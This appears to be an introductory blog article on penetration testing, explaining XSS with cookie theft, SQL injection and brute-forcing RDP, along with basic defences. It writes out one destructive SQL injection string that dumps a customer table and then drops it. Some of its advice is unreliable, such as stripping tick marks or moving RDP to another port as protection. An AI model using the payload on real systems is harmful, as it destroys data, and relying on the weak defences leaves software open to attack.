You probably have heard about penetration testing. Penetration testing is a form of scripting that lets the tester identify common security issues in your software. Usually, penetration testing is used on web applications, but penetration testing covers all forms of security. You can perform some penetration testing on your own, although automated scripts make it easier for the beginner. Here are some basic tests you can perform yourself or at least be aware of when you launch your application.
1. Cross-Site Scripting or XSS
First, let’s cover XSS and query strings. Query strings are the key-value pairs you see in a URL. The following URL includes a query string with a “customer” variable or key and the customer value “Joe.”
Most developers take the “Joe” value and print it directly to the browser page. What happens if “Joe” is replaced with the following value?
Query string values aren’t the only way to use XSS. The hacker can also use XSS to send data to a database that is then rendered to an internal employee’s browser. The hack works in the same way, but the hacker can get much more critical information when XSS is printed to an employee’s browser. Let’s assume that the hacker uses XSS to send a script to a database where a customer service rep opens the application to review a customer record. The customer service rep is logged into the site and has cookies on her computer with account information. The hacker can use XSS to send himself information from those cookies, which could lead to unauthorized access to your internal applications.
2. SQL Injection
SQL injection is a hacking method that allows SQL code to run in a database. It can be any database, but the injection usually targets MySQL. MySQL, Oracle and MSSQL have slightly different syntax, so the hacker must account for these differences to be successful. MySQL is the most common database used on public web applications, so most hackers target MySQL. However, some SQL injection hacks will work on any SQL database.
SQL injection can be used in query strings or forms. If you use these values to build dynamic SQL statements, you’re susceptible to SQL injection. The main character used in SQL injection is the tick mark. Look at the following SQL statement:
select * from customers where name='joe';
Notice the string value “joe” is enveloped in tick marks. The opening tick mark indicates the starting point of the string and the second tick mark is the string’s termination. The semicolon tells the SQL engine that the statement is finished. You can have more than one SQL statement on the same line as long as you terminate them with the semicolon. Now, take a look at this SQL injection code.
select * from customers where name=' ' or 1=1; drop table customer; -- '
The “‘; drop table customer; –” is injected into your statement by the hacker using query strings or form input. What happens in this hack is that the first SQL select statement is terminated prematurely. The “1=1” statement is logical syntax that returns all rows in the customer table. The semicolon ends the statement, and then the hacker drops the customer table. The result is that your customer table is deleted after all of your customer data is returned to the hacker. The “– ‘” part of the statement comments the final tick mark to avoid creating a SQL syntax error.
SQL injection hacks are very complex, but they are the most popular since most webmasters have some kind of SQL executing on the server. They are used mainly on WordPress sites since plugin developers build dynamic inline SQL within the code. To protect against SQL statements, you should use stored procedures or scrub the user input to remove tick marks. The cleanup from this hack can be tedious, so ensure your code does not allow SQL code to run from user input.
3. Brute Force Attacks
Brute force is a method used to “guess” a user’s password. Brute force attacks use dictionary words or a combination of words to make “guesses” until the final password is revealed. Brute force attacks are probably the easiest to defend against, but most hackers use brute force attempts on open ports that you might not monitor.
For instance, remote desktop protocol (RDP) is a common protocol that runs by default on port 3389. RDP lets you remotely access a server’s desktop. It’s a common Microsoft Windows remote management tool that’s integrated with the operating system. The hacker runs brute force software that continuously tries to guess your RDP connection password. If you’re running a small business or a personal site, you’re probably not monitoring the RDP port. The hacker can just continue to run scripts that send random passwords to the server until he finally guesses the password. Once the hacker has remote access to the server, he can do whatever he wants with the configurations, software, or storage.
Brute force attacks are probably the least identifiable but the easiest to manage. The best way to defend against these attacks is to lock accounts after a certain amount of login attempts. The second protection method is to run common software on an alternative port. Instead of running RDP on port 3389, choose a different, uncommon port. Hackers are about the quantity game, so they will move on to a server that runs RDP on a common port rather than find your RDP port. Of course, if the hacker is specifically targeting you, it’s not a guarantee that he will move on but hackers running scripts will likely skip your server.
These three common hacks should be a priority when you penetration test. They are the most common, but you should also check for any flaws in your website security. Most webmasters consider security last and don’t think they could be victims. However, when a hacker gets a hold of your private data, it can be a devastating blow to the company’s integrity and reputation.